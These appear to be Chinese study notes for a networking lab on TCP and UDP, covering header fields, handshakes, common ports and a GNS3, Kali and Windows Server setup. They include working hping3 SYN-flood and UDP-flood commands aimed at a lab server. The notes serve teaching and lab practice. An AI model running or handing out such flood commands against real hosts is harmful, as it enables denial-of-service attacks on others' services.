传输层协议

1.TCP
2.UDP

TCP协议

回顾内容

1. 传输层功能：定义应用层协议数据报文的端口号，流量控制
2. 对原始数据进行分段处理

传输层所提供服务

• 传输连接服务
• 数据传输服务：流量控制、差错控制、序列控制

一、传输层的TCP协议

1.面向连接的传输协议

• 要求数据在传输以前必须建立连接，数据传输后，必须释放连接
• 仅支持单播传输，在两个终端之间建立的点对点连接

2.UDP用户数据报协议

二、TCP报文字段

字段含义：TCP报文格式详解，图解超详细！

【计算机网络】TCP协议——1.报文格式详解_tcp报文-CSDN博客

1.建立三次握手

2.TCP释放连接的四次挥手

3.TCP半关闭状态

4.TCP半连接状态

会产生SYN flood，属于DoS的一种。

5.常见TCP端口号

• 21 FTP
• 22 SSH
• 23 TELNET
• 25 SMTP
• 53 DNS
• 80 HTTP
• 110 POP3
• 143 IMAP4
• 443 HTTPS
• 3306 MYSQL
• 3389 RDP

三、实施SYN flood

实施：

• 在kali上使用hping3工具

防御：

• 使用TCP代理（防火墙），比如10G的带宽，需要很多个w
• TCP源探测，防火墙开启该功能，下一代防火墙

1.GNS3中

• 安装好GNS3之后，进行配置

  

#进入路由器中

2.kali中

输入：进入vim

#在kali中,将网段设置成VMnet1
vim /etc/...
#按下A键
#写入
auto eth0
iface eth0 inet static
address 192.168.1.50
netmask 255.255.255.0
gateway 192.168.1.254
#写完后按下esc键，：
:wq! #保存并退出ifdown eth0 #关闭网口
ifup eth0 #打开网口
ifconfig #查看kali的IP地址
route -n #查看路由表

#在Windows server 2016中，将网络设置为VMnet8
#W配置IP地址
#进入cmd
netsh interface ip set address "Ethernet0" static 192.168.2.100 255.255.255.0 192.168.2.254
ipconfig

#在kali中实施攻击
hping -c 1000 -d 200 -S -w 64 -p 80 --flood --rand-source 192.168.2.100

四、Windows Server 2016搭建网站

• 打开服务器管理器

• 管理
• 添加角色和功能
• 下一步，下一步
• 服务器选择：下一步
• 勾选web服务器，添加功能，下一步

• 一直下一步，直到安装

五、安装GNS3

超详细GNS3安装和使用教程，避免各种报错 - ghbuff - 博客园

【CCNP | 网络模拟器GNS系列】安装、配置和使用 GNS3_gns3的安装步骤及导入路由器镜像的过程-CSDN博客

UDP协议

UDP（用户数据报）协议，是传输层的另外一个协议

一、简单概念

1、特点

不需要建立连接，直接发送数据，不会去重新排序，不需要确认

2、报文字段

• 源端口
• 目标端口
• UDP长度
• UDP校验和

3、常见的UDP端口号

• 53 DNS
• 69 TFTP
• 111 RPC
• 123 NTP
• 161 SNMP

二、实施UDP Flood攻击

配置路由器IP

在Windows中

netstat -anop udp

开启53号端口

在kali中实施攻击

hping3 -q -n --rand-source --udp -p 53 --flood 192.168.2.100 -d 10000